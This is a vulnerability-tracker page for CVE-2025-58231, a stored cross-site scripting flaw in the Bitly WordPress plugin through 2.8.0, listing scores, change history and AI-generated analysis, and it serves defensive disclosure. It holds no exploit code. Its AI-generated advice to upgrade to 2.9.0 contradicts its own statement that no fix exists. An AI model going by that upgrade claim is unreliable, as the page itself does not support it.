Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly wp-bitly allows Stored XSS.This issue affects Bitly: from n/a through <= 2.8.0.
Published: 2025-09-22
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Bitly WordPress plugin version 2.8.0 or earlier contains an improper neutralization of input during web page generation that permits an attacker to inject malicious script code. An attacker can store script in a form field, and the code will be rendered in the browser of any user who views the generated page, allowing the attacker to steal cookies, hijack sessions, or perform other client‑side actions. The vulnerability is a classic example of the input‑validation weakness listed as CWE‑79.

Affected Systems

The vulnerable component is the Bitly provider’s WordPress plugin, distributed under the name Bitly by bitlydeveloper. All installations of this plugin with a version equal to or older than 2.8.0 are affected, including earlier releases. The plugin is commonly deployed on WordPress sites that use the Bitly share integration.

Risk and Exploitability

The CVSS score of 6.5 marks it as a medium‑severity flaw. The EPSS value of less than 1% indicates that, as of now, it appears to be a low‑probability target for active exploitation. The vulnerability is not listed in the CISA KEV catalog. Exploitation would likely involve the attacker submitting malicious input through the plugin’s user‑facing interface, which is then stored and rendered for all site visitors. Because the attack vector requires any user to submit data that is later displayed, the opportunity is limited to sites that allow untrusted input to be stored.

Generated by OpenCVE AI on April 30, 2026 at 01:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Bitly WordPress plugin to version 2.9.0 or later, which removes the stored XSS flaw.
  • Remove any previously stored data or posts that may contain malicious script code.
  • Review the plugin settings to ensure user input is either disallowed or properly sanitized, and consider disabling the plugin if an upgrade cannot be applied promptly.

Generated by OpenCVE AI on April 30, 2026 at 01:22 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-30574 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly allows Stored XSS. This issue affects Bitly: from n/a through 2.7.4.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly allows Stored XSS. This issue affects Bitly: from n/a through 2.7.4. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly wp-bitly allows Stored XSS.This issue affects Bitly: from n/a through <= 2.8.0.
Title WordPress Bitly Plugin <= 2.7.4 - Cross Site Scripting (XSS) Vulnerability WordPress Bitly plugin <= 2.8.0 - Cross Site Scripting (XSS) vulnerability
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 23 Sep 2025 17:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 23 Sep 2025 16:15:00 +0000

Type Values Removed Values Added
First Time appeared Bitly
Bitly bitly
Wordpress
Wordpress wordpress
Vendors & Products Bitly
Bitly bitly
Wordpress
Wordpress wordpress

Mon, 22 Sep 2025 18:30:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly allows Stored XSS. This issue affects Bitly: from n/a through 2.7.4.
Title WordPress Bitly Plugin <= 2.7.4 - Cross Site Scripting (XSS) Vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Bitly Bitly
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:42.699Z

Reserved: 2025-08-27T16:19:27.210Z

Link: CVE-2025-58231

cve-icon Vulnrichment

Updated: 2025-09-23T15:56:19.791Z

cve-icon NVD

Status : Deferred

Published: 2025-09-22T19:16:08.193

Modified: 2026-04-23T15:33:20.897

Link: CVE-2025-58231

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-30T01:30:24Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')